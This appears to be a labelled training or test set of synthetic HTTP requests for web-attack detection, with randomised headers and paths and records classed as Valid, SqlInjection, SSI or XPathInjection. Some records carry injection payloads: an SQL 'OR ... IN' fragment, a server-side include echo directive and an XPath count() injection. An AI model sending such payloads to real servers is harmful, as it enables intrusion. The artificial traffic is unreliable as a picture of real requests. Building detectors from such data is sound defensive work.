Authorization: Digest response="1dc96fF364a0Aa8AF3cFC4B673bA702D"
Range: -652120,9-,091-
Referer: /Fxchdhs/sde3dv/Ehcdydqr/Aoeboiu.cgi
TE: trailers,trailers,trailers
Trailer: From
User-Agent: den6 (npcczA; mkk-DmJ; eHL47sKxD; 5CF_rY; eMO3xdjS6T)
UA-CPU: MIPS
UA-Disp: 227,815,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8564x328
Via: FTP/5.5 14.98.1.99, 1.1 www.jxejpe.htm
Transfer-Encoding: deflate
Upgrade: hje/6.5
Warning: 209 www.atoDlsAt.htm "lwrhisc1S" 
X-Forwarded-For: 35.90.162.224
X-Serial-Number: 87401
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16388
Start - Id: 11163
class: Valid
GET /r..ConWdtMJm/gp3Q_pTMT/etcshntEoim/osirwoTqs2ekiayhrro/vIYAdpe2/hmeeppDqtq1yenl4oo/1P6Zugl/aWZ67EETM4_Gh/aC9P/l7i8UM_jWN9M4_B7JP_/sci3o.cfm?auaneehlgsoem=u%3F&33hioo2=%7Co&rydnHnusEteIe=6%5Dae&5TunchvlBwepord=2 HTTP/1.0
Host: 165.79.199.59:04
Connection: tpsp
Accept: */*;q=0.9
Accept-Charset: x-mac-cyrillic, iso-10646-ucs-2;q=0.2, x-mac-arabic, windows-1258
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: min-fresh=2
Client-ip: 86.6.116.71
Cookie: helI7Tdhfag=nSvx6;.cnf=623104;aymi=020093194;ci3d9v95goaynr=ijew5bw;oMxtef=b4eis
Cookie2: $Version="851"
Date: Sun, 31 Jul 05 12:36:02 CET
ETag: W/"ge@mXiOhyQIIo.KU55"
Expect: nrEdnjet=rejdasia
From: daneee@lheneowi.org
If-Modified-Since: Tue, 31 Aug 04 15:55:13 UTC
If-Unmodified-Since: Sun, 20 Dec 09 15:25:29 UTC
If-Match: *
If-None-Match: "u02W@7APVcgoq9WX"
If-Range: Wed, 20 Apr 05 18:58:51 CET
Max-Forwards: 2140
MIME-Version: 0.7
Pragma: 0s7='r'
Proxy-Authorization: Digest response="FF6f55D1baDeb6c2C872bb57B9eB0aDd"
Authorization: NTLM bm90cnJkNmlzcmVocmFvYm5ob3lydG9zbHpzbmlhcmVl
Range: 01809-,9808-,-723
Referer: http://www.Kitth.it/ih2f/zlscasi/pmy0ese/rs1s/a6hkp.exe
TE: trailers,gzip,trailers
Trailer: Warning
User-Agent: Mozilla/5.6 (X11; U; Linux i386 4.3; sy-Hs; rv:2.6.4) Gecko/08297876
UA-CPU: StrongARM
UA-Disp: 5419,0442,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 571x624
Via: 9.6 121.114.31.120, eiS/2.5 www.hrtieadU.js:30, gethto/5.6 6.1.34.146
Transfer-Encoding: gzip
Upgrade: sma/1.3, wob8L/8.0, olat/7.1, duc/0.2
Warning: 365 157.254.77.1:08 "9zm9b6laeoj5ro7i5hsl" "Fri, 22 Feb 08 19:43:13 CET"
X-Forwarded-For: 199.166.24.178
X-Serial-Number: 98553683859236748
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11163
Start - Id: 15759
class: Valid
GET /4AXj/rSEfy1M/t7T/e4RgWlKUV5PBuK5K7C/jM-chWMR--zsSud/cJez/FstXJN/itarolkdEmet.html?mnTea=e&anyo=9pye%25&tsi=iarolp0mh8bdnilf&EXroS=onr%3ClTa8emi&TRv5y4xp_UP8=o6stehttyfukaf&ai3Er=uO8S.&i5hjy=Bn&fmdanuumbtatH=95976&q2bQa=4811293&insertGFIY=0224&m8sefeis9O9u5gm=76&cf-6=ieoet52eCxlthhn3nl HTTP/1.0
Host: www.0gdtn.org
Connection: etonm
Accept: text/*;q=0.6, image/*;q=0.5, audio/*
Accept-Charset: *
Accept-Encoding: gzip, gzip, gzip;q=0.3, gzip, identity
Accept-Language: t-780teOae;q=0.1, Rflie-tohA9bsS;q=0.5, t8h-a, eehak-eyt3rm;q=0.4, eeueygla-wyqit
Cache-Control: no-transform
Client-ip: 195.199.12.74
Cookie: ay9aoe=3;nYS-G1jGWk=17;vtmn=e4Fg5YBI;lectoasz0lo5m=dcoasDeigzdlintn;nl8P=rtaSia;8JidN=wSooMDe-Qex
Cookie2: $Version="9"
Date: Fri, 25 Apr 08 13:13:09 CET
ETag: W/"8gjWBxU9zw2EktF"
Expect: 100-continue
From: tmcou1ni@As4tTc.be
If-Modified-Since: Thu, 31 May 07 01:34:56 CET
If-Unmodified-Since: Tue, 08 Jul 08 12:26:15 CET
If-Match: ".EOUA7lCfV7zj3Hi9"
If-None-Match: "NDBZjG4buq98467A9J"
If-Range: *
Max-Forwards: 0
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest nc=FFab5d86
Authorization: Digest cnonce="m5da"
Range: -8290,128062-441231,3-
Referer: http://rntn.ch/o1ndamp/adE4r/4rno/eSEsefd/rTE4fsa2.tar
TE: chunked,chunked,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.3 (X11; U; Solaris 7.0; ao-tv; rv:1.5.5) Gecko/93942633
UA-CPU: MIPS
UA-Disp: 238,6520,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 516x1974
Via: HTTP/1.2 www.a6t5.html, 5.2 142.114.64.45, 5.5 25.57.36.242
Transfer-Encoding: deflate
Upgrade: fav/1.1, ayrmt/1.8, brsiit/7.7, udri/7.9
Warning: 240 81.227.30.13 "eamm5" "Mon, 26 Dec 05 16:14:01 UTC"
X-Forwarded-For: 76.30.185.202
X-Serial-Number: 698228
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15759
Start - Id: 33590
class: Valid
PUT /6W.H%uG4NgtiE8J/koLN.RL4ZaKXJ9Gp7T/mTw2/rs_yvBxa9kzMP/includecb.M/yyPgB0/q./p1mFrtrlei7lrn/mCPrhqI-Bx.gif? HTTP/1.0
Content-Length: 131
Content-Language: tss,ireboD,rtdsn
Content-Encoding: compress
Content-Location: http://mzGzm.it/o8Rena/neaon.txt
Content-MD5: M2hyb2l1b29lcnVtTUVvbA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Thu, 28 Aug 08 05:14:41 GMT
Host: www.yAchoEh.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=46
Client-ip: 222.54.144.234
Cookie2: $Version="14"
Date: Sat, 19 Dec 09 24:14:58 GMT
ETag: "ciF200hWiwYrJvul3"
Expect: 100-continue
If-Unmodified-Since: Fri, 30 Apr 04 01:44:05 CET
If-Match: *
If-None-Match: "SxbIUhfzZ8xBMVl8J"
If-Range: "Orl@_ovmCA62MGOy2k"
Max-Forwards: 53
MIME-Version: 8.6
Pragma: ge='Tu'
Authorization: i6uhuo oSyasoi=yfentndt
Referer: /f6sr2IeC/i9hKee4n/rndirn/8ehd/bhenqn.conf
TE: gzip,deflate,trailers
User-Agent: iydLj (yF_0sx; yuR36ol)
Upgrade: aUsdbi/6.3
Warning: 893 www.lhbahae.tiff "etmsh" "Tue, 15 Jun 04 22:14:16 CET"
X-Forwarded-For: 203.16.92.234
----: -----------------------------------------------

rslkafjee=eilsT0a&6dtZep=[e &j4sIyunrsl=roltu(o'meoknc&lwf=qStFi30&5oehEephaoesxhi=e&smeaAoa3gn9o=document5itladminett8'uei

End - Id: 33590
Start - Id: 2591
class: Valid
GET /g7ep9zS1z0_KaS/4e7G@H2scriptq-MU/ovaCF@oeHV0PY9a/hqa6LnLiBC6jqA/ULHpxtermTjexecs/iq/tfrWwGkjUAn/ddIuKthKraoc.png?nAMf7fpLn=Nhu&sock_streamjunionwmT1lU=1692295&03eetfnne6uppv=ion&4M.F=fAioodCh&esEehhxinnhbde=398&ael=+%28t0ha%3Cen7m8sd2uabodyHt HTTP/1.1
Host: 86.248.110.198
Connection: keep-alive
Accept: image/*, text/*, video/*;q=0.4
Accept-Charset: macintosh, iso-8859-8, x-mac-cyrillic;q=0.1, x-mac-turkish
Accept-Encoding: compress;q=0.2, gzip
Accept-Language: ebdOeeo-aensmn, Qmehswls-7osr;q=0.8
Cache-Control: no-store
Client-ip: 55.106.123.246
Cookie: yaeig7h3sfTe=zSyo;a8=nTXDko
Cookie2: $Version="56"
Date: Thu, 31 May 07 18:21:11 CET
ETag: W/"P66bts1whz9tBiEI"
Expect: 100-continue
From: nenonte@ily8ueedor.uk
If-Modified-Since: Sun, 17 Aug 08 08:49:59 CET
If-Unmodified-Since: Tue, 15 Jun 04 05:09:25 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 359
MIME-Version: 0.1
Pragma: rd='4lesetsb'
Proxy-Authorization: NTLM c2dzeVRldW5ONFdlZW1peXZlbnNzbGJ1c3V2bTJvTXg=
Authorization: Digest nc=1A6CB05c
Range: 9-6,46-1
Referer: http://www.noees.net/eogqyit/crfrmft9/3rMii8w/ilh5e/Os8as.zip
TE: gzip;q=0.3
Trailer: Referer
User-Agent: Mozilla/5.5 (compatible; Konqueror/6.6; SunOS sun4u; txmrnnoi; nyhg)
UA-CPU: PowerPC
UA-Disp: 9744,1465,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 440x033
Via: 6.2 143.198.222.251
Transfer-Encoding: svie
Upgrade: hutie/7.1
Warning: 852 www.tmttloo.html "nksortaobujtnde9N" 
X-Forwarded-For: 254.65.44.244
X-Serial-Number: 77079667
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 2591
Start - Id: 22071
class: Valid
GET /KJB9o8k4Z/0ymentlzwcmetriwYf/8W9oleGx0eiwAW/knors/eCIH4Jodn/6dlcncaTasnob5Tn1nc/tesL/iyesSmhzgbzEe/57s/S3gF/dh/ceCBa.pl?feLohwtla=erfmvG2JA&wC4te=1 HTTP/1.0
Host: www.aftndolNew.org
Connection: close
Accept: application/zip, application/x-tar
Accept-Charset: iso-8859-7, iso-2022-kr;q=0.1, cp-932;q=0.1, iso-8859-2, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: s6sd-iO3ohrt;q=0.2, shg8tT-owlesup, ml-ta0hgmee;q=0.9, iex-shelepH;q=0.5, m-ese
Cache-Control: only-if-cached
Client-ip: 20.114.23.32
Cookie: srsnsn3eabeSthr=147;memniDsnIo=94878815;sxee=Ih%b4nn;haaooitBeuto7=sniEoiHfiframee/me;iqSvsg=vIug
Cookie2: $Version="255"
Date: Sat, 12 Jan 08 12:08:57 CET
ETag: W/"kPLtVKQiUiN1u_DtD8s"
Expect: zfsalo=enctD;epADtrl=Nn0ya
From: kdhjpy@6iewo7.st
If-Modified-Since: Tue, 30 Mar 10 21:34:20 UTC
If-Unmodified-Since: Thu, 12 Oct 06 02:43:30 CET
If-Match: "b.z7rA7JGPD-oiCkLKIw"
If-None-Match: "aqt6iFbkgRNBGHITa"
If-Range: Fri, 03 Mar 06 02:49:25 GMT
Max-Forwards: 095
MIME-Version: 4.7
Pragma: ntnm=j8os2I
Proxy-Authorization: NTLM b2VMemlwc2hIMndzdGM1dGRlZWFIMTV1ZG85OGxlZm9yaQ==
Authorization: Basic d29JNjpyMDgz
Range: -774
Referer: /woSOtsM.doc
TE: gzip;q=0.1
Trailer: Pragma
User-Agent: blc6r (kTQ2-k3; sgPsGuHdq.; 0oM1.15.; 8piFlp3by)
UA-CPU: StrongARM
UA-Disp: 7235,8490,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 4071x1172
Via: FTP/2.2 52.44.20.205, 8.2 194.229.173.143, HTTP/6.6 16.44.83.34
Transfer-Encoding: compress
Upgrade: soic/3.3, o5pho/0.0
Warning: 721 www.eaGi.html "UawfosanHHaojndn" "Wed, 01 Nov 06 18:16:15 GMT"
X-Forwarded-For: 26.127.5.71
X-Serial-Number: 42920569636252963929
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22071
Start - Id: 42393
class: SqlInjection
GET /f0.7lidD/lNMqw-X9/o-be5AnMrc_/mA4iFD@m2BNWmB8t/onhhtb0efsf/sEeljrrbtyb77att/2t4/q2drW64PCY/uwQPRqs@o2-Tib_K9bC/Q4d2lQM1VXAfA/1positionoQstyleHr-/utn.cgi?eivqiavco=ohbe2sgan&yaidhOLlnfengwi=+cas&genjcn7eito=50&regnhro6trtZ=adeantq&pqdsTts6dnLre=cno2nyclgRsse&eav=rhng1EnAea1e&ceensslt=ne8qzi&.ZR9=4pnlpr7Eeo6i&stcE=944121361&tkI=ldAo-&t1us=342658&NWY-.Gwget=OR+%27s6sylw%27+IN++++%28+%27+%27+++%29 HTTP/1.0
Host: www.lpostefghf.st:80
Connection: keep-alive
Accept: application/*;q=0.3, text/*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: Sc8tbtr-tgkL3p, hbv5-yrdaes;q=0.5
Cache-Control: max-stale
Client-ip: 173.58.91.50
Cookie: y4etin=orBehhkb;4Ssaernsb4ii=1;scriptvkwDHtelnet9Tr=31;NsrWoqlrns=y$
Cookie2: $Version="2"
Date: Mon, 20 Jul 09 23:20:22 CET
ETag: "CDmsLIMNDEVrfaLecxl"
Expect: 100-continue
From: aespw@dgaxhlomnn.it
If-Modified-Since: Thu, 12 Nov 09 12:32:09 GMT
If-Unmodified-Since: Fri, 02 Mar 07 11:53:41 UTC
If-Match: "r5NTx6DAobWciNVPbC7N"
If-None-Match: *
If-Range: Thu, 03 Aug 06 01:18:18 UTC
Max-Forwards: 9
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: hVsby7 Ii6eef=veeOhti
Range: -012964
Referer: /msiih2c/tf1o8Bih.exe
TE: trailers,deflate
Trailer: Host
User-Agent: Mozilla/8.5 (compatible; Konqueror/4.4; SunOS sun4u; kk4n2odz; ssmibrilms; traqes)
UA-CPU: StrongARM
UA-Disp: 791,8136,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3589x325
Via: 8.4 www.rndsj.shtml, 5.4 173.146.54.217
Transfer-Encoding: deflate
Upgrade: rse/1.1, o5mn/7.6, zlr3/8.8, or7Eaa/3.4
Warning: 999 147.111.219.75 "f2re1Ss" 
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 42393
Start - Id: 25716
class: Valid
GET /1@1Ql/yHa-3XT.Sx8XqXJfQs1/8._QJf_@/oyahet/qrn1JEtcw/aLsittctO/AQC/YChtpass9QCbmetao/hd3wne.bin?evuc=gl%5Cnws&2bjMoCW=ctbbrAHFG_&eEis1aa6ad=tf_LnR1&fqt=eDS9-Miy&GUpdivlsB=aflktmpatl8c&altnr=0047&sdmmb=tnn&az8m=toeebylg7qsT&hgnohi=o%24inputfe7iffrom+i%28n2aUwam&siX=eh%7CxtermO&ada1tlAcefa=rLom9wCKh-N&0samqjwMbxCl7H=oTu_vqIhak&sBe=08226&EwGnlacoanasat=taMiaeneoi HTTP/1.0
Host: 162.165.171.6
Connection: close
Accept: text/html;q=0.9, audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 39.160.15.83
Cookie: Dei=cc8dtapGQMY_;eds=nnEr;r8nE6Z3R4=64;j8arn099dnu=yA/=
Cookie2: $Version="4"
Date: Sun, 26 Sep 04 01:34:44 GMT
ETag: W/"djUo6Ljud8-mNba7BSm"
Expect: 100-continue
From: rpMt@acyfsddga.fr
If-Modified-Since: Sun, 19 Jul 09 05:25:09 UTC
If-Unmodified-Since: Mon, 25 Dec 06 24:02:15 GMT
If-Match: "3bfK0WVkaQnNBQT1I4x"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 1.3
Pragma: ubeseru=0w4iit4
Proxy-Authorization: NTLM ZWZ1YXI1Y3FIaW50ZWVwNnRuYW5sb2FhSXJhaWFudHd5OWFlMW1rOVU=
Authorization: Digest response="6bADbfbE60cB8AF1f1ED500BAe807746"
Range: -1,27054-,1-75962
Referer: /idtry/beygcu/tecxcrt.php4
TE: trailers,gzip;q=0.4
Trailer: Trailer
User-Agent: Mozilla/1.5 (Machintosh; U; PPC 7.9; nb-1t; rv:4.7.0) Gecko/32842589
UA-CPU: MIPS
UA-Disp: 7894,3200,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1468x714
Via: FTP/1.3 www.guoaecec.jpg, 3.1 www.euhmsh8t.js
Transfer-Encoding: compress
Upgrade: ojeiet/9.9, woq/6.0, ttYs/5.7, urTi2/9.1
Warning: 290 www.CltSOC.jpeg "lorOta1roSd" 
X-Forwarded-For: 4.231.239.216
X-Serial-Number: 550159
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25716
Start - Id: 34148
class: Valid
POST /NW/80o/hG9-kpAGUNPFqSNLO5y/dAzlujngey/Dpda4xtermU@ZS/eCniekseyasar/hsiaexextrobvrn/ies1tqeeRUlltnm/nN9H7Lq0mC/s9aeerhndlvmw0/dfQ0hJlWO.-.html? HTTP/1.1
Content-Length: 106
Content-Language: 2yrcay
Content-Encoding: compress
Content-Location: http://eoiase.it/i0ta2ts/rasd/oelm8mo/gnshihc.zip
Content-MD5: cG1VMkxpNW9uZW1oY2VpdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 23 Jun 09 11:37:44 CET
Last-Modified: Sat, 28 Jun 08 05:35:59 UTC
Host: www.igslcmE.be
Connection: keep-alive
Accept: text/*;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: Otql8ba-ielEs;q=0.9
Cache-Control: min-fresh=04
Client-ip: 75.68.94.45
Cookie: he=vl9eru9rpatSpnTlF
Cookie2: $Version="339"
Date: Thu, 11 Oct 07 12:41:02 CET
ETag: "KEI.oj4E9Hw.Jzu"
Expect: 100-continue
From: elh3tsco@Oytt10o9e.org
If-Modified-Since: Tue, 22 Dec 09 18:33:59 CET
If-Unmodified-Since: Wed, 06 Apr 05 20:09:36 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 15 Jun 05 05:47:12 UTC
Max-Forwards: 34
MIME-Version: 4.0
Pragma: tEnarimu='rsaiy4m'
Proxy-Authorization: Digest cnonce="ri3ml"
Authorization: Basic c09sMHJhaTphZWZlamU=
Range: -85
Referer: http://lonRi.com/naynmh/iIsurwpn/Ayo6S.bin
TE: chunked;q=0.8,gzip;q=0.3,trailers
Trailer: Cache-Control
User-Agent: Mozilla/7.0 (compatible; lm8tee2i; WinNT; iiog; 6urdxii5an; aogt)
UA-CPU: MIPS
UA-Disp: 654,4575,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 995x590
Via: s9Opi/3.0 28.29.83.134:585, 0.0 www.dalfIrvx.html, oiiuh/8.9 www.tzd7hr.jpeg:81
Transfer-Encoding: identity
Upgrade: r9e3sj/2.9, ssde/1.5, 28o5l/1.1, cra/1.9, oir/5.1
Warning: 306 75.33.43.3 "apg0" "Sun, 22 Jul 07 01:14:23 UTC"
X-Forwarded-For: 148.127.25.65
X-Serial-Number: 18830507621799
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

lyosktdA=3372295&eo1peoazAxamti=lsoptste>Ahe8 f6d m>&8E=raaccess_log em&ahOtn=tRS4tt&nttnausoo=0432189

End - Id: 34148
Start - Id: 11499
class: Valid
GET /uZ4pWscript/aV7b./8RwD/sirwhlhsA9/c3/l8ti0eoeath/OiebteIouy9tCE0Eoa/tnaf07kaigOxdnu/saG4/Tsm41mutlirttdkxN/.Wgroup byx.9andGp.jpg?fimm=23&cnejsxIgdmh2ghw=0413910&dslelB=0748238&eersee1xrNnmcD=656044&ntt=nhnod7sbhditzh&mr3enlYeouh=000857&eu5bi=555340647&enoad=eapuEsRwbs8dns3et&ds4e=149&4ErqnEnOnrcv=ioatc&I3odre8vsphtt=ssvari%2690ao6&zrnmnu=r.NU1O07A.%40&gW6XcV=homedl9&rcrtLe=noIdrsuIeytit3ld&dtiS4set0=80893349 HTTP/1.0
Host: 202.239.173.29
Connection: va3Mae
Accept: text/plain;q=0.0, audio/basic;q=0.7
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.6, gzip, deflate;q=0.7, gzip
Accept-Language: *;q=0.9
Cache-Control: max-age=7892
Client-ip: 202.164.225.150
Cookie: QdeleteZjVorcpvDpr=z a
Cookie2: $Version="655"
Date: Wed, 02 Feb 05 21:44:57 CET
ETag: W/".pewZE4RLyHSexutlCIk"
Expect: 100-continue
From: enye@7Awe.com
If-Modified-Since: Wed, 07 Apr 10 04:34:08 UTC
If-Unmodified-Since: Wed, 01 Sep 04 13:32:07 GMT
If-Match: *
If-None-Match: "ZbGR7NJSzzn-rn.z"
If-Range: *
Max-Forwards: 1
MIME-Version: 7.5
Pragma: 553s9nsa=eShcr
Proxy-Authorization: Basic c0V0NDpzb2Zy
Authorization: Basic eXRndDp4aDlpbnQ=
Range: -36
Referer: http://ustaet.gov/2ssf5at.exe
TE: trailers,trailers
Trailer: If-Match
User-Agent: o5nvtlh0 (rDIZ0qk)
UA-CPU: 68000
UA-Disp: 9055,045,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9366x217
Via: 7.7 71.191.4.225, FTP/4.0 106.249.100.80
Transfer-Encoding: gzip
Upgrade: etrea/7.4, ylteR/1.1, 9ffa/6.2, 52wzrc/8.8, teesh/2.0
Warning: 090 68.2.195.170:1 "ene5ebeNyr34uhehmh" "Sun, 10 Jun 07 01:27:55 CET"
X-Forwarded-For: 0.47.132.31
X-Serial-Number: 606663375
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 11499
Start - Id: 14286
class: Valid
GET /sqwa9aa/formgroup bykLvNkx3j_v/isQqF.css?tiumn2lMOtcngAo=j%40hwSV HTTP/1.0
Host: 176.146.229.179
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-japanese;q=0.3, ks_c_5601-1987;q=0.3, iso-8859-15
Accept-Encoding: compress;q=0.5
Accept-Language: *;q=0.3
Cache-Control: min-fresh=99167
Client-ip: 12.204.42.238
Cookie: mDnd=dZyZ5C;xlwyt0e37Nwir=i;anakoTlmboitgid=hcafoex6o;gm=ttMoiecbssesdt3r;St5J-K=EiwaiDra3h4execoedfps;gwasaaipo=9630
Cookie2: $Version="20"
Date: Sat, 14 Mar 09 20:43:25 GMT
ETag: W/"UozJeZl-wTXUU04"
Expect: ya6mphne=miwliiHh
From: 5Urtoesa@acesm4hrat.de
If-Modified-Since: Tue, 27 Oct 09 21:58:00 GMT
If-Unmodified-Since: Tue, 16 May 06 08:53:01 CET
If-Match: "GTJBA_9o_69JPgEg"
If-None-Match: "eGwkvx.CjPNGLpe9ra8X"
If-Range: *
Max-Forwards: 553
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic TWVTbXN4ZW06c3J5ZW1F
Authorization: alnmtr Hspeh=iwxrtaip
Range: 118-,169-11
Referer: /mxd5le/we3hOih.jpeg
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.5 (Machintosh; U; PPC 5.9; au-da; rv:3.8.7) Gecko/83734930
UA-CPU: MIPS
UA-Disp: 6371,9716,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2883x951
Via: 2.0 241.129.8.18:00, 5.0 www.6Hawuue.jpg
Transfer-Encoding: aaaemm
Upgrade: tut/3.1, tnmcy/2.5, 9Pn5n/5.5, wtte/0.4, sWn/2.2
Warning: 266 www.herseaeN.jpeg "tmrynotpilhesnurx1o" "Tue, 06 Sep 05 18:17:57 UTC"
X-Forwarded-For: 235.126.58.179
X-Serial-Number: 0081275585581186032
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14286
Start - Id: 39170
class: SSI
POST /4_Ogyy8n/agmemdM0Ehdtntb/0hbucnyar/tlH2-/e_Tmm.shtml? HTTP/1.1
Content-Length: 78
Content-Language: dmaaoma
Content-Encoding: compress
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Jan 04 23:44:08 CET
Last-Modified: Thu, 20 May 04 23:21:11 UTC
Host: 96.237.236.46
Connection: keep-alive
Accept: text/*, image/gif, text/*;q=0.7
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: eb2gss-r, qf1nod-ei
Date: Tue, 03 Feb 04 02:48:38 GMT
Referer: http://www.Hoalo.ch/kyierhld/rcces/woshee3y/owo3tr/3piNh6ds.sh
User-Agent: Mozilla/1.8 (compatible; Konqueror/3.9; Windows NT; nmnexeH0; aeieeooele; ioHtgs)
Via: 1.7 237.184.121.134, FTP/2.0 www.tawafutw.jpg

EacceptRKBcJ=<!--#echo var="date_gmt"-->&tdTaaDon8g=8.bI4ExolnCE

End - Id: 39170
Start - Id: 28741
class: Valid
GET /eLQ.to4DIJ8qn/tb7eeisd0rTbbt8a/dKtG/rrh/hkotrndlnhmpeeeeoo/l6OL9oteetsts8iesauv/7uj/Qexec8Yg/aeri/acaudsksyIaTitdwhe/neirstuli.shtml?t0nc0bu=229&siatxhes=14973&l0rrotDhnteesee=43&cQX@C=r%5Dni&ufqfMg0K=telnetr HTTP/1.0
Host: www.Msaa.it
Connection: BheaWke
Accept: */*
Accept-Charset: x-mac-arabic;q=0.1, iso-2022-jp;q=0.8
Accept-Encoding: *;q=0.1
Accept-Language: qgcc5c-pdC;q=0.3, hrrsas9-nedRa;q=0.1
Cache-Control: e=csiifnr
Client-ip: 188.154.46.117
Cookie: uaodatcbyn=a;rlasuA0pr=1
Cookie2: $Version="077"
Date: Wed, 23 Jul 08 01:45:07 CET
ETag: W/"VapG01IF6yB0Kx8Md"
Expect: 100-continue
From: cmNaehb@twerq2.gov
If-Modified-Since: Thu, 01 Jun 06 11:40:49 UTC
If-Unmodified-Since: Fri, 06 Nov 09 18:36:40 GMT
If-Match: *
If-None-Match: *
If-Range: "ylOmC7ViE44foAxGIo"
Max-Forwards: 30
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: leenm tunetoit=agEociN
Range: 302858-
Referer: http://www.sanue.be/ndias/emone.jpeg
TE: trailers,deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: nsdiota/4.4
UA-CPU: MIPS
UA-Disp: 062,8206,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 621x541
Via: 1.5 51.250.246.73:34, 6.3 www.HtGsa.css
Transfer-Encoding: compress
Upgrade: olt/8.4, ims0ht/1.8, kbAWuk/5.7, nca/7.3, rYdmr/0.3
Warning: 778 www.delpvr.tiff:9 "lWlloldaaSoesjyoe" 
X-Forwarded-For: 41.255.95.49
X-Serial-Number: 4663959328161
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 28741
Start - Id: 49911
class: XPathInjection
GET /tlilkesa1imdqsnx/4c0q@c8GEx@MY7.dll?ahtabhzets=tasn%3C%40xtermhttpibR&sneEio=75&xPNfYBD=1.I&rsehih=3&sCisai=0++++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++6014%3D&tdckt=oS3x7B3.rCp&ednr=++atepnp%3Abi%29Sa1&idu86=idGk6s%40Sua4&smisehl=574021228&iut=5&t8tx=ey1p1oIahGdlso&r2seo81YoLee7o=7&rq=7&enr8lnsenRhu=cbEa HTTP/1.1
Host: www.oqxzbsOatt.de
Connection: keep-alive
Accept: */*
Accept-Charset: isiri-3342;q=0.3, iso-8859-7, iso-10646-ucs-2;q=0.8, windows-1251;q=0.1, cp-950
Accept-Encoding: gzip;q=0.0
Accept-Language: esdy2fxv-Stff;q=0.8, te-ott;q=0.3
Cache-Control: no-store
Client-ip: 107.232.49.49
Cookie: 9LtelnetdH=awnoehOs;_RPdb=an>ti);oecer=te%%o/laccepti7dsv;7oztri=altsee0wneRtr=8crw;Crgestte1edglj=c@S-wnTagit
Cookie2: $Version="34"
Date: Sun, 30 Apr 06 03:01:29 CET
ETag: "-PkzT_C75R64usx5m"
Expect: shiNeesn=gk8dcin
If-Modified-Since: Thu, 30 Jun 05 02:24:07 UTC
If-Unmodified-Since: Thu, 16 Sep 04 08:50:16 CET
If-Match: "VgRM.hzWFWwvjV@43"
If-None-Match: *
If-Range: "37q_00X1Gk@yBjxEQeY"
Max-Forwards: 9
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: NTLM d2Rha2V0dHZsd3NyZmVzc25Ub25jaW5lZGVrc3RvZWttckpFbmN1c2w=
Authorization: Digest algorithm=MD5-sess
Range: 3-
Referer: /ash6eed/4nae5be/OownG.txt
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/5.4 (compatible; Konqueror/2.5; Windows NT; o0m7la)
UA-CPU: MIPS
UA-Disp: 3308,0110,8
Via: 3.3 80.7.64.89, 6.5 www.oo6aobll.jpg
Transfer-Encoding: deflate
Upgrade: iEnTvf/9.1
X-Serial-Number: 2013029504
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49911
Start - Id: 6936
class: Valid
PUT /sbjaDPOEpK/wq6tSQA/ouoheoDhdb.css? HTTP/1.0
Content-Length: 136
Content-Language: 7ehe0ca7,e,Seoekweg
Content-Encoding: gzip
Content-Location: /ahontnee/erao.pdf
Content-MD5: YTlwaUk3RXJpbDllczI3cQ==
Content-Type: application/x-www-form-urlencoded
